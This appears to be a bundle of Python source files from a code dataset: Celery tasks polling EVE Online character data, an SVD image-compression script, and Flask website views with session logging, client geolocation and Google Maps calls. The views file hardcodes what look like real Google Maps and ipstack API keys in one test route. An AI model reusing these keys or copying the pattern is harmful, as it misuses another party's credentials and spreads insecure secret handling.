refresh_character_skills.apply_async(args=(character.id,), countdown=random.randint(0, 300))\n\n@celery_queue.task(bind=True, ignore_result=True, default_retry_delay=60)\ndef refresh_character_location(self, character_id, recurring=30):\n \"\"\"Refresh a characters current location.\"\"\"\n\n try:\n character = session.query(CharacterModel).filter(CharacterModel.id==character_id).one()\n\n job_log.debug(\"user.refresh_character_location {}\".format(character.character_name))\n\n try:\n system_id = esi_characters.location(character.character_id, access_token=character.access_token)\n except (InvalidToken, ExpiredToken):\n try:\n refresh_access_token(character)\n system_id = esi_characters.location(character.character_id, access_token=character.access_token)\n except:\n return job_log.warn(\"removing user.refresh_character_ship {}\".format(character.character_name))\n\n if system_id is not None:\n system_id = system_id[\"solar_system_id\"]\n system = EVESolarSystemModel.from_id(system_id)\n\n if len(character.location_history) and system.id == character.location_history[-1].system_id:\n # backoff\n if recurring < 300:\n recurring = recurring + 30\n else:\n recurring = 30\n\n history_entry = CharacterLocationHistory(character, system)\n eve_log.warn(\"{} moved to {}\".format(character.character_name, system.eve_name))\n session.add(history_entry)\n\n session.commit()\n\n if recurring:\n refresh_character_location.apply_async(args=(character_id, recurring), countdown=recurring)\n except requests.exceptions.ConnectionError as e:\n self.retry(exc=e)\n\n@celery_queue.task(bind=True, ignore_result=True, default_retry_delay=60)\ndef refresh_character_ship(self, character_id, recurring=60):\n \"\"\"Refresh a characters current ship.\"\"\"\n try:\n character = session.query(CharacterModel).filter(CharacterModel.id==character_id).one()\n\n job_log.debug(\"user.refresh_character_ship {}\".format(character.character_name))\n\n try:\n type_id = esi_characters.ship(character.character_id, access_token=character.access_token)\n except (InvalidToken, ExpiredToken):\n try:\n refresh_access_token(character)\n type_id = esi_characters.ship(character.character_id, access_token=character.access_token)\n except:\n return job_log.warn(\"removing user.refresh_character_ship {}\".format(character.character_name))\n\n\n if type_id is not None:\n item_id = type_id[\"ship_item_id\"]\n type_id = type_id[\"ship_type_id\"]\n\n eve_type = EVETypeModel.from_id(type_id)\n\n if len(character.ship_history) and character.ship_history[-1].eve_type == eve_type:\n # backoff\n if recurring <= 600:\n recurring = recurring + 60\n else:\n recurring = 60\n\n eve_log.warn(\"{} boarded {}\".format(character.character_name, eve_type.eve_name))\n\n history_entry = CharacterShipHistory(character, eve_type)\n history_entry.eve_item_id = item_id\n\n session.add(history_entry)\n\n session.commit()\n\n if recurring:\n refresh_character_ship.apply_async(args=(character_id, recurring), countdown=recurring)\n except requests.exceptions.ConnectionError as e:\n self.retry(exc=e)\n\n\n@celery_queue.task(bind=True, ignore_result=True, default_retry_delay=60)\ndef refresh_character_corporation(self, character_id, recurring=3600):\n try:\n character = session.query(CharacterModel).filter(CharacterModel.id==character_id).one()\n\n job_log.debug(\"user.refresh_character_corporation {}\".format(character.character_name))\n\n corporation_id = esi_characters.detail(character.character_id)\n\n if corporation_id is not None:\n corporation_id = corporation_id[\"corporation_id\"]\n\n corporation = EVECorporationModel.from_id(corporation_id)\n\n if not len(character.corporation_history):\n # This character has no corp history at all\n session_entry = CharacterCorporationHistory(character, corporation)\n session_entry.join_date = datetime.now() # XXX fetch this from the actual join date?\n session.add(session_entry)\n session.commit()\n elif len(character.corporation_history) and character.corporation_history[-1].corporation is corporation:\n # Character is still in the same corporation as the last time we checked, we need to do nothing\n pass\n elif len(character.corporation_history) and character.corporation_history[-1].corporation is not corporation:\n # Character changed corporation, close the last one and create a new one\n previously = character.corporation_history[-1]\n previously.exit_date = datetime.now()\n\n currently = CharacterCorporationHistory(character, corporation)\n currently.join_date = datetime.now()\n \n session.add(currently)\n session.add(previously)\n\n session.commit()\n\n eve_log.warn(\"{} changed corporations {} -> {}\".format(\n character,\n previously.corporation,\n currently.corporation)\n )\n\n if recurring:\n refresh_character_corporation.apply_async(args=(character_id, recurring), countdown=recurring)\n except requests.exceptions.ConnectionError as e:\n self.retry(exc=e)\n\n@celery_queue.task(bind=True, ignore_result=True, default_retry_delay=60)\ndef refresh_character_skills(self, character_id, recurring=14400):\n try:\n character = session.query(CharacterModel).filter(CharacterModel.id==character_id).one()\n\n job_log.debug(\"user.refresh_character_skills {}\".format(character.character_name))\n\n try:\n skills = esi_characters.skills(character.character_id, access_token=character.access_token)\n except (InvalidToken, ExpiredToken):\n try:\n refresh_access_token(character)\n skills = esi_characters.skills(character.character_id, access_token=character.access_token)\n except:\n return job_log.warn(\"removing user.refresh_character_ship {}\".format(character.character_name))\n\n if skills and \"skills\" in skills: # XXX why can skills be None here?\n skills = skills[\"skills\"]\n\n for skill in skills:\n skill_id = skill[\"skill_id\"]\n\n eveskill = EVESkillModel.from_id(skill_id)\n\n session.add(eveskill)\n session.commit()\n\n skill_level = skill[\"current_skill_level\"]\n skill_points = skill[\"skillpoints_in_skill\"]\n\n characterskills = session.query(CharacterSkillModel).filter(\n CharacterSkillModel.character_id==character.id\n ).filter(\n CharacterSkillModel.eve_skill_id==eveskill.id\n ).all()\n\n # XXX why?\n for characterskill in characterskills:\n session.delete(characterskill)\n\n session.commit()\n\n characterskill = CharacterSkillModel(character)\n characterskill.eve_skill = eveskill\n characterskill.level = skill_level\n characterskill.points = skill_points\n\n session.add(characterskill)\n\n session.commit()\n\n if recurring:\n refresh_character_skills.apply_async(args=(character_id, recurring), countdown=recurring)\n except requests.exceptions.ConnectionError as e:\n self.retry(exc=e)\n","sub_path":"apoptosis/queue/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":9406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"331992271","text":"import numpy as np\nimport matplotlib.image as mpi\nimport qr\nimport matplotlib.pyplot as plt\n\n\n\n# Separe les trois couleurs de la matrice d'une image\n# img: matrice de l'image\n# retourne le triplet des matrices RVB\ndef split_colors(img):\n img_red = []\n img_green = []\n img_blue = []\n\n for i in range(len(img)):\n img_red.append([])\n img_green.append([])\n img_blue.append([])\n\n for j in range(len(img[0])):\n img_red[i].append(img[i][j][0])\n img_green[i].append(img[i][j][1])\n img_blue[i].append(img[i][j][2])\n\n return np.matrix(img_red), np.matrix(img_green), np.matrix(img_blue)\n\n\n# Remet une couleur dans un bon intervalle:\ndef color_around(x):\n if x < 0:\n return 0.\n if x > 1:\n return 1.\n return x\n\n\n# A partir de matrices rouge, verte et bleue, genere une image\ndef fusion_colors(red, green, blue):\n img_full = []\n\n for i in range(len(red)):\n img_full.append([])\n for j in range(len(red[0])):\n img_full[i].append([])\n img_full[i][j].append(color_around(red[i, j]))\n img_full[i][j].append(color_around(green[i, j]))\n img_full[i][j].append(color_around(blue[i, j]))\n\n return img_full\n\n\n# Transforme un vecteur en une matrice diagonale\ndef vector_to_diag(v, n, m):\n d = np.zeros((n, m))\n\n for i in range(n):\n d[i, i] = v[0, i]\n\n return d\n\n\n# Decomposition SVD avec NumPy\n# k: nombre de valeurs gardees sur la diagonale\ndef compression_with_numpy_svd(k, img_name):\n img_full = mpi.imread(img_name)\n red, green, blue = split_colors(img_full)\n\n u_red, s_red, v_red = np.linalg.svd(red)\n u_green, s_green, v_green = np.linalg.svd(green)\n u_blue, s_blue, v_blue = np.linalg.svd(blue)\n\n for i in range(k, len(img_full)):\n s_red[i] = 0\n s_green[i] = 0\n s_blue[i] = 0\n\n red_approx = np.matrix(u_red)*np.matrix(vector_to_diag(np.array([s_red]), len(u_red), len(v_red)))*np.matrix(v_red)\n green_approx = np.matrix(u_green)*np.matrix(vector_to_diag(np.array([s_green]), len(u_green), len(v_green)))*np.matrix(v_green)\n blue_approx = np.matrix(u_blue)*np.matrix(vector_to_diag(np.array([s_blue]), len(u_blue), len(v_blue)))*np.matrix(v_blue)\n\n img_full_approx = fusion_colors(np.array(red_approx), np.array(green_approx), np.array(blue_approx))\n\n #mpi.imsave(str(k) + img_name, np.array(img_full_approx))\n\n return error_in_compression(img_full, img_full_approx)\n\n# svd_numpy(5, \"p3_takeoff_base_square.png\")\n\ndef compression_with_our_svd(k, img_name):\n img_full = mpi.imread(img_name)\n red, green, blue = split_colors(img_full)\n\n u_red, s_red, v_red = qr.svd_with_numpy(red, 20)\n u_green, s_green, v_green = qr.svd_with_numpy(green, 20)\n u_blue, s_blue, v_blue = qr.svd_with_numpy(blue, 20)\n\n for i in range(k, len(img_full)):\n s_red[i] = 0\n s_green[i] = 0\n s_blue[i] = 0\n\n red_approx = np.dot(np.dot(np.matrix(u_red), np.matrix(vector_to_diag(s_red, len(u_red), len(v_red)))), np.matrix(v_red))\n green_approx = np.dot(np.dot(np.matrix(u_green), np.matrix(vector_to_diag(s_green, len(u_green), len(v_green)))), np.matrix(v_green))\n blue_approx = np.dot(np.dot(np.matrix(u_blue),np.matrix(vector_to_diag(s_blue, len(u_blue), len(v_blue)))),np.matrix(v_blue))\n\n img_full_approx = fusion_colors(np.array(red_approx), np.array(green_approx), np.array(blue_approx))\n\n #mpi.imsave(str(k) + img_name, np.array(img_full_approx))\n return error_in_compression(img_full, img_full_approx)\n#compression_with_our_svd(50, \"p3_takeoff_base_square.png\")\n\n\ndef error_in_compression(A, B):\n sum = 0\n for i in range(len(A)):\n for j in range(len(A[0])):\n for k in range(len(A[0, 0])):\n sum += ((B[i][j][k] - A[i][j][k]) ** 2)\n\n return np.sqrt(sum)\n\ndef plot_error():\n errors1 = []\n errors2 = []\n k_list = range(200)\n\n print(\"Plotting errors while compressing, this step can take a while...\")\n\n for k in k_list:\n errors1.append(compression_with_our_svd(k, \"p3_takeoff_base_square.png\"))\n errors2.append(compression_with_numpy_svd(k, \"p3_takeoff_base_square.png\"))\n\n plt.plot(k_list, errors1)\n plt.plot(k_list, errors2)\n plt.show()\n\nplot_error()\n\n\n\n","sub_path":"image_manipulation.py","file_name":"image_manipulation.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"431726810","text":"\"\"\"\nRoutes and views for the flask application.\n\"\"\"\n#import logging\n#from __future__ import unicode_literals\n#import sqlite3\n#from flask_paginate import Pagination, get_page_args\n#import click\n#click.disable_unicode_literals_warning = True\n\n\nfrom datetime import datetime\nfrom datetime import timedelta\n#import time\n#import googlemaps\n#from datetime import datetime\n\nimport requests\n#import json\n\n#from flask import Flask\nfrom flask import flash\nfrom flask import render_template\nfrom flask import request\nfrom flask import redirect\n#from flask import url_for\nfrom flask import session\nfrom flask import g, current_app\n\n#from flask import logging\n#from flask import jsonify\nfrom flask_login import current_user, login_required #, login_user, logout_user\n\n# Import the app object from the main app module __INIT__\nfrom . import app\n\n# Import module forms\nfrom .module_authorization.forms import LoginForm, RegistrationForm, ContactUsForm, forgetPasswordForm\nfrom .forms import CookiesConsentForm\n#from .models import Visit, VisitPoint, Page_Visit\n#from sqlalchemy import func\nfrom .external_services.log_services import set_geolocation, client_IP, log_visit, log_page, log_route, log_splash_page, log_info, log_variable, RealClientIPA\nfrom .external_services.token_services import generate_unique_sessionID\nfrom .debug_services.debug_log_services import *\n\n###########################################################################\n###########################################################################\n###########################################################################\n### functions\n###########################################################################\n###########################################################################\n###########################################################################\n##########################################\n#put this after @ decorator\n##########################################\n#how to get a config variable app.config.get('RECAPTCHA_PRIVATE_KEY'))\n#how to get a config variable app.config.get('RECAPTCHA_PUBLIC_KEY'))\n#request.method: GET\n#request.url: http://127.0.0.1:5000/alert/dingding/test?x=y\n#request.base_url: http://127.0.0.1:5000/alert/dingding/test\n#request.url_charset: utf-8\n#request.url_root: http://127.0.0.1:5000/\n#str(request.url_rule): /alert/dingding/test\n#request.host_url: http://127.0.0.1:5000/\n#request.host: 127.0.0.1:5000\n#request.script_root:\n#request.path: /alert/dingding/test\n#request.full_path: /alert/dingding/test?x=y\n#request.args: ImmutableMultiDict([('x', 'y')])\n#request.args.get('x'): y\n#varPageName = request.args.get('url')\n#alert(varPageName)\n###########################################################################\n###########################################################################\n###########################################################################\n### define the routes, accepted methods (GET/POST) and the service function\n###########################################################################\n###########################################################################\n###########################################################################\n#app.secret_key = '/r/xd8}q/xde/x13/xe5F0/xe5/x8b/x96A64/xf2/xf8MK/xb1/xfdA7x8c'\n#############################################################\n#############################################################\n#############################################################\n@app.teardown_request\ndef teardown(error):\n if hasattr(g, 'conn'):\n print('TEARDOWN !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!',error)\n g.conn.close()\n\n@app.before_first_request\ndef init_cookies_etc_before_first_request():\n log_module_start('@app.before_first_request')\n log_info('SITE FIRST REQUEST !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n\n #this will make session cookies expired in 5 minutes\n #set app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(minutes=5)\n #session.permanent = True\n\n #1. init session cookies\n log_info('init session cookies')\n\n session['active_module'] = __name__\n session['urls'] = []\n session['pages'] = []\n clientIPA = client_IP()\n session['clientIPA'] = clientIPA\n session['visit'] = 0\n try:\n session['lastpageHTML'] = app.homepage_html\n except:\n session['lastpageHTML'] = 'page_templates/landing_page.html'\n session.modified = True\n\n #2. import splash forms objects\n log_info('init app (splash) forms')\n\n app.loginform = LoginForm()\n app.loginform.eyecatch.data = __name__\n app.registrationform = RegistrationForm()\n app.contactusform = ContactUsForm()\n app.forgetpasswordform = forgetPasswordForm()\n app.cookiesconsentform = CookiesConsentForm()\n log_variable('debug_log_services_eyecatch', debug_log_services_eyecatch)\n log_module_finish('@app.before_first_request')\n\n@app.before_request\ndef set_cookies_etc_before_request():\n if request.base_url.lower().find('/static/') >= 0 :\n return\n\n log_request_start(request.base_url)\n log_start('@app.before_request')\n\n log_info('save necessary cookies')\n\n session['active_module'] = __name__\n if not session.get('sessionID'):\n token = generate_unique_sessionID()\n session['sessionID'] = token\n log_variable('@@@ NEW SESSION @@@', session.get('sessionID'))\n dt = datetime.now()\n strdt = dt.strftime(\"%Y-%m-%d %H:%M:%S\")\n session['identityDT'] = strdt\n session['session_expiry'] = 60\n\n if 'identityDT' not in session:\n dt = datetime.now()\n strdt = dt.strftime(\"%Y-%m-%d %H:%M:%S\")\n session['identityDT'] = strdt\n session['session_expiry'] = 60\n #log_info('*** new session started', session.get('identityDT'), session.get('session_expiry'))\n\n if not session.get('visit'):\n session['visit'] = 100\n session['visit'] = session.get('visit') + 1\n session['visitpoint_try'] = 0\n\n if 'urls' not in session:\n session['urls'] = []\n if 'pages' not in session:\n session['pages'] = []\n if 'clientIPA' not in session:\n clientIPA = client_IP()\n session['clientIPA'] = clientIPA\n if session['clientIPA'] != RealClientIPA():\n clientIPA = RealClientIPA()\n session['clientIPA'] = RealClientIPA()\n \n log_info('check session expiry')\n\n strdt = session['identityDT']\n t1 = datetime.strptime(strdt, \"%Y-%m-%d %H:%M:%S\")\n t2 = datetime.now()\n duration = t2 - t1\n duration_sec = duration.total_seconds()\n session['session_expiry'] = duration_sec\n if duration_sec >= 60*60:\n dt = datetime.now()\n strdt = dt.strftime(\"%Y-%m-%d %H:%M:%S\")\n session['identityDT'] = strdt\n session['session_expiry'] = 60*60\n log_info('***session expired after 1 hour', duration_sec)\n app.logger.critical('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! SESSION EXPIRED !!! IP:{0}'.format(session.get('clientIPA')))\n session.pop('VisitID', None) # delete visitID\n session.pop('VisitNumber', None) # delete visitNumber\n session.pop('VisitPointID', None) # delete visitpointID\n session.pop('VisitPointNumber', None) # delete visitpointNumber\n session.pop('clientIPA', None) # delete clientIPA\n\n log_info('check cookies consent expiry')\n if 'cookies_consent_time' in session:\n strdt = session['cookies_consent_time']\n t1 = datetime.strptime(strdt, \"%Y-%m-%d %H:%M:%S\")\n t2 = datetime.now()\n duration = t2 - t1\n duration_sec = duration.total_seconds()\n #duration_min = divmod(duration_sec, 60)[0]\n #print('XXXX-check-duration',duration_sec, duration_min)\n if duration_sec >= 0:\n session['cookies_consent'] = 'EXPIRED'\n app.logger.critical('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! COOKIES CONSENT EXPIRED !!! IP:{0}'.format(session.get('clientIPA')))\n else:\n session['cookies_consent'] = 'YES'\n else:\n session['cookies_consent'] = 'NO'\n\n #2. init spash forms with authenticated user info\n log_info('move authenticated user info to the (splash) forms')\n if current_user.is_authenticated:\n if app.forgetpasswordform:\n app.forgetpasswordform.email.data = current_user.email\n if app.contactusform:\n app.contactusform.firstName.data = current_user.firstName\n app.contactusform.lastName.data = current_user.lastName\n app.contactusform.company.data = current_user.company\n app.contactusform.jobTitle.data = current_user.jobTitle\n app.contactusform.email.data = current_user.email\n app.contactusform.contact_message.data = ''\n\n\n #3. log the visit in db\n log_info('log the visit in DB')\n log_visit()\n \n session.modified = True\n\n log_finish('@app.before_request')\n\n@app.after_request\ndef set_cookies_after_request(response):\n log_start('@app.after_request')\n log_finish('@app.after_request')\n log_request_finish(request.base_url)\n return response\n\n###########################################################################\n###########################################################################\n###########################################################################\n### module functions\n###########################################################################\n###########################################################################\n###########################################################################\ndef set_deviceandscreen_properties(width, height, devicepixelratio):\n session['screen_width'] = width\n session['screen_height'] = height\n session['device_pixelration'] = devicepixelratio\n session['splash_forms_width'] = str(width - 100)+'px'\n return\n#############################################################\n#############################################################\n#############################################################\n### routes and pages\n#############################################################\n#############################################################\n#############################################################\n@app.route('/')\ndef homepage():\n page_name = 'home'\n page_function = 'homepage'\n page_template = 'page_templates/landing_page.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/landing_page.html')\n\n@app.route('/landingpage')\ndef landingpage():\n page_name = 'landingpage'\n page_function = 'landingpage'\n page_template = 'page_templates/landing_page.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/landing_page.html')\n\n@app.route('/contact')\ndef contact():\n page_name = 'contact'\n page_function = 'contact'\n page_template = 'page_templates/contact.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/contact.html')\n\n@app.route('/about')\ndef about():\n page_name = 'about'\n page_function = 'about'\n page_template = 'page_templates/about.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/about.html')\n\n@app.route('/company')\ndef company():\n page_name = 'company'\n page_function = 'company'\n page_template = 'page_templates/company.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/company.html')\n\n@app.route('/services')\ndef services():\n page_name = 'services'\n page_function = 'services'\n page_template = 'page_templates/services.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/services.html')\n\n@app.route('/why')\ndef why():\n page_name = 'why'\n page_function = 'why'\n page_template = 'page_templates/why.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/why.html')\n\n@app.route('/research')\ndef research():\n page_name = 'research'\n page_function = 'research'\n page_template = 'page_templates/research.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/research.html')\n\n@app.route('/academy')\ndef academy():\n page_name = 'academy'\n page_function = 'academy'\n page_template = 'page_templates/academy.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/academy.html')\n\n@app.route('/knowledge')\ndef knowledge():\n page_name = 'knowledge'\n page_function = 'knowledge'\n page_template = 'page_templates/knowledge.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/knowledge.html')\n\n@app.route('/prototypes')\ndef prototypes():\n page_name = 'prototypes'\n page_function = 'prototypes'\n page_template = 'page_templates/prototypes.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/prototypes.html')\n\n@app.route('/cookies_policy')\ndef cookies_policy():\n page_name = 'cookies policy'\n page_function = 'cookies_policy'\n page_template = 'page_templates/cookies_policy.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/cookies_policy.html')\n\n@app.route('/privacy_policy')\ndef privacy_policy():\n page_name = 'privacy policy'\n page_function = 'privacy_policy'\n page_template = 'page_templates/privacy_policy.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/privacy_policy.html')\n\n@app.route('/terms_and_conditions')\ndef terms_and_conditions():\n page_name = 'terms and conditions'\n page_function = 'terms_and_conditions'\n page_template = 'page_templates/terms_and_conditions.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/terms_and_conditions.html')\n\n@app.route('/language/')\ndef set_language(language=None):\n log_route('change language', 'set_language')\n session['language'] = language\n log_info('language set to {0}'.format(language))\n return redirect(session['lastpageURL'])\n\n@app.route('/cookiesconsentform/', methods=['GET', 'POST'])\ndef cookiesconsentform(answer):\n page_name = 'cookiesconsentform-splash-form'\n page_function = 'cookiesconsentform'\n page_form = 'splash_form_cookiesconsent.html'\n log_splash_page(page_name, page_function, '', '', page_form)\n if answer.upper() == 'AGREE':\n dt = datetime.now() + timedelta(days=31)\n else:\n #dt = datetime.now() + timedelta(seconds=60)\n dt = datetime.now() + timedelta(days=1)\n strdt = dt.strftime(\"%Y-%m-%d %H:%M:%S\")\n session['cookies_consent_time'] = strdt\n session['cookies_consent'] = 'YES'\n flash('Thank You. Your data are protected', 'success')\n return redirect(session.get('lastpageURL'))\n\n#############################################################\n#############################################################\n#############################################################\n### client-to-server utilities:\n#############################################################\n#############################################################\n#############################################################\n@app.route('/location', methods=['POST'])\ndef location():\n latitude = request.json.get('latitude')\n longitude = request.json.get('longitude')\n session['geolocation'] = [latitude, longitude]\n log_variable('geolocation', session.get('geolocation'))\n set_geolocation(latitude, longitude)\n log_route('geolocation', 'geolocation')\n return('')\n@app.route('/deviceandscreen', methods=['POST'])\ndef deviceandscreen():\n width = request.json.get('width')\n height = request.json.get('height')\n devicepixelratio = request.json.get('devicepixelratio')\n session['device'] = [width, height, devicepixelratio]\n log_variable('device', session.get('device'))\n set_deviceandscreen_properties(width, height, devicepixelratio)\n log_route('deviceandscreen', 'deviceandscreen')\n return('')\n\n#############################################################\n#############################################################\n#############################################################\n### prototypes:\n#############################################################\n#############################################################\n#############################################################\n@app.route('/myBank')\n@login_required\ndef myBank():\n page_name = 'myBank-prototype'\n page_function = 'myBank'\n page_template = 'myBank/myBank_index.html'\n page_form = ''\n log_page(page_name, page_function, page_template, '', page_form)\n return render_template(\n 'mybank/mybank_index.html'\n , title='myBank'\n , message='open banking prototype........'\n )\n\n@app.route('/myGame')\ndef myGame():\n page_name = 'myGame-prototype'\n page_function = 'myGame'\n page_template = 'myGame/myGame.html'\n page_form = ''\n log_page(page_name, page_function, page_template, '', page_form)\n return render_template(\n 'myGame/myGame.html'\n , title='myGame'\n , message='gaming prototype........'\n )\n#############################################################\n#############################################################\n#############################################################\n### test utilities:\n#############################################################\n#############################################################\n#############################################################\n@app.route('/test_cookiesconsent')\ndef test_cookiesconsent():\n dt = datetime.now() - timedelta(days=111)\n strdt = dt.strftime(\"%Y-%m-%d %H:%M:%S\")\n session['cookies_consent_time'] = strdt\n session['cookies_consent'] = 'NO'\n return redirect(session.get('lastpageURL'))\n\n@app.route('/test_google_api')\ndef test_google_api():\n page_name = 'terms and conditions'\n page_function = 'terms_and_conditions'\n page_template = 'page_templates/terms_and_conditions.html'\n log_page(page_name, page_function, page_template)\n clientip = '213.149.173.194'\n GOOGLE_MAPS_API_KEY='AIzaSyCstqUccUQdIhV69NtEGuzASxBQX5zPKXY'\n if session.get('geolocation'):\n try:\n lat = session.get('geolocation')[0] \n lon = session.get('geolocation')[1] \n except:\n lat = 0\n lon = 0\n return render_template('page_templates/terms_and_conditions.html')\n else:\n lat = -1\n lon = -1\n return render_template('page_templates/terms_and_conditions.html')\n\n log_info('-----lat,lon',lat,lon)\n #lat = session.get('geolocation')[0] \n #lon = session.get('geolocation')[1] \n\n # api_url = 'https://www.googleapis.com/geolocation/v1/geolocate?key=AIzaSyCstqUccUQdIhV69NtEGuzASxBQX5zPKXY\n path = 'http://api.ipstack.com/{0}?access_key={1}'.format(clientip, '4022cfd2249c3431953ecf599152892e')\n path = 'https://maps.googleapis.com/maps/api/geocode/json?latlng={0},{1}&key={2}'.format(lat,lon,GOOGLE_MAPS_API_KEY)\n log_variable('apistack geolocation path', path)\n #print (path)\n r = requests.post(path)\n log_variable('request',r)\n #reply_code=r.status_code\n # if not r.status_code == requests.codes.ok:\n #response = {}\n if r:\n response = r.json()\n address_comps = response['results'][0]['address_components']\n types = ['locality', 'administrative_area_level_1', 'country', 'postal_code']\n filter_method = lambda x: len(set(x['types']).intersection(types))\n res=filter(filter_method, address_comps)\n for geoname in res:\n common_types = set(geoname['types']).intersection(set(types))\n log_info ('{} ({})'.format(geoname['long_name'], ', '.join(common_types)))\n # nam = ', '.join(common_types)\n # val = geoname['long_name']\n # print(nam, val)\n\n formatted_address = response['results'][0]['formatted_address']\n log_info ('{} ({})'.format(formatted_address, 'formatted address'))\n\n # #log_variable('apistack geolocation result', response)\n # log_info('==================================================')\n # #for key, value in response.items():\n # #log_variable('---'+key, value)\n # #log_info('------------------')\n # log_info('==================================================')\n # res= response['results']['address_components']\n # for item in res:\n # log_variable('--- ---',item)\n # for key, value in item.items():\n # log_variable('--- --- ---'+key, value)\n\n# import json\n# import urllib2\n\n# def get_geonames(lat, lng, types):\n# url = 'http://maps.googleapis.com/maps/api/geocode/json' + \\\n# '?latlng={},{}&sensor=false'.format(lat, lng)\n# jsondata = json.load(urllib2.urlopen(url))\n# address_comps = jsondata['results'][0]['address_components']\n# filter_method = lambda x: len(set(x['types']).intersection(types))\n# return filter(filter_method, address_comps)\n\n# lat, lng = 59.3, 18.1\n# types = ['locality', 'administrative_area_level_1']\n\n# # Display all geographical names along with their types\n# for geoname in get_geonames(lat, lng, types):\n# common_types = set(geoname['types']).intersection(set(types))\n# print '{} ({})'.format(geoname['long_name'], ', '.join(common_types))\n\n # gmaps = googlemaps.Client(key='AIzaSyCstqUccUQdIhV69NtEGuzASxBQX5zPKXY')\n # # Geocoding an address\n # geocode_result = gmaps.geocode('1600 Amphitheatre Parkway, Mountain View, CA')\n # log_variable('geocode_result', geocode_result)\n\n # # Look up an address with reverse geocoding\n # reverse_geocode_result = gmaps.reverse_geocode((34.6841, 33.0379))\n # log_variable('reverse_geocode_result', reverse_geocode_result)\n\n # # Request directions via public transit\n # now = datetime.now()\n # directions_result = gmaps.directions(\"Sydney Town Hall\",\n # \"Parramatta, NSW\",\n # mode=\"transit\",\n # departure_time=now)\n # log_variable('directions_result', directions_result)\n \n #rootWindow = None\n #mapLabel = None\n\n #defaultLocation = \"Mauna Kea, Hawaii\"\n #mapLocation = defaultLocation\n #mapFileName = 'googlemap.gif'\n # https://maps.googleapis.com/maps/api/staticmap?center=Brooklyn+Bridge,New+York,NY&zoom=13&size=600x300&maptype=roadmap\n # &markers=color:blue%7Clabel:S%7C40.702147,-74.015794&markers=color:green%7Clabel:G%7C40.711614,-74.012318\n # &markers=color:red%7Clabel:C%7C40.718217,-73.998284\n # &key=YOUR_API_KEY\n\n #############static map\n key='&key='+GOOGLE_MAPS_API_KEY\n\n urlbase = \"http://maps.google.com/maps/api/staticmap?\"\n zoomLevel = 15\n mapType = \"satellite\" #\"roadmap\" #\"terrain\"\n width = 600\n height = 300\n markers = \"&markers=color:red|size:mid|label:VisitPoint|{},{}\".format(lat, lon)\n args = \"center={},{}&zoom={}&size={}x{}&format=gif{}\".format(lat,lon,zoomLevel,width,height,markers)\n mapType = \"&maptype={}\".format(mapType)\n google_maps_url = urlbase+args+mapType+key\n return redirect(google_maps_url)\n \n #############dynamic map\n key='&key='+GOOGLE_MAPS_API_KEY\n urlbase = \"https://www.google.com/maps/@?api=1&map_action=map\"\n args = \"¢er={},{}&zoom={}&size={}x{}&format=gif{}\".format(lat,lon,zoomLevel,width,height,markers)\n #¢er=-33.712206,150.311941&zoom=12&basemap=terrain\n google_maps_url = urlbase+args+mapType+key\n return redirect(google_maps_url)\n\n # https://www.google.co.uk/maps/place/@{0},{1}\".format(session.get('longitude'),session.get('longitude')) %}\n # {% set href=href+\"\" %}\n #
    \n # {{session.get('latitude')}},{{session.get('longitude')}}\n # \n return render_template('page_templates/terms_and_conditions.html')\n\n","sub_path":"website_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"504770554","text":"import sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import inspect, create_engine, func, desc\nfrom sqlalchemy.engine import reflection\n\nfrom flask import (\n Flask,\n render_template,\n jsonify,\n request,\n redirect)\n\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Database Setup\n#################################################\nfrom flask_sqlalchemy import SQLAlchemy\nengine = create_engine(\"sqlite:///DataSets/belly_button_biodiversity.sqlite\")\n\n\n# Reflecting db into a new model\nBase = automap_base()\n\n# reflect tables\nBase.prepare(engine, reflect=True)\n\n# Save tables to classes\nMtadata = Base.classes.samples_metadata\nOtu = Base.classes.otu\nSamples = Base.classes.samples\n\n#initiate a session\nsession = Session(engine)\n\n#this is from the pets activity - what does it do?\ndef __repr__(self):\n return '' % (self.name)\n\n# Create a route to render index.html homepage template\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n#Create a route that renders a list of the sample names\n@app.route(\"/names\")\ndef names_list():\n\n # Create inspector and connect it to the engine\n inspector = inspect(engine)\n\n # Collect the names of the tables within the db\n tables = inspector.get_table_names()\n\n # using the inspector to print the column names of tables\n columns = inspector.get_columns('samples')\n\n col_names = []\n\n for column in columns[1:]:\n col_names.append(column['name'])\n\n return jsonify(col_names)\n\n# List of OTU descriptions in the\n# ex . \"Archaea;Euryarchaeota;Halobacteria;Halobacteriales;Halobacteriaceae;Halococcus\",\n# \"Bacteria\",\n\n@app.route(\"/otu\")\ndef description():\n #reviewed the table elements in DB Browser for SQLite, lowers_taxonomic_unit is the name of the column\n results = 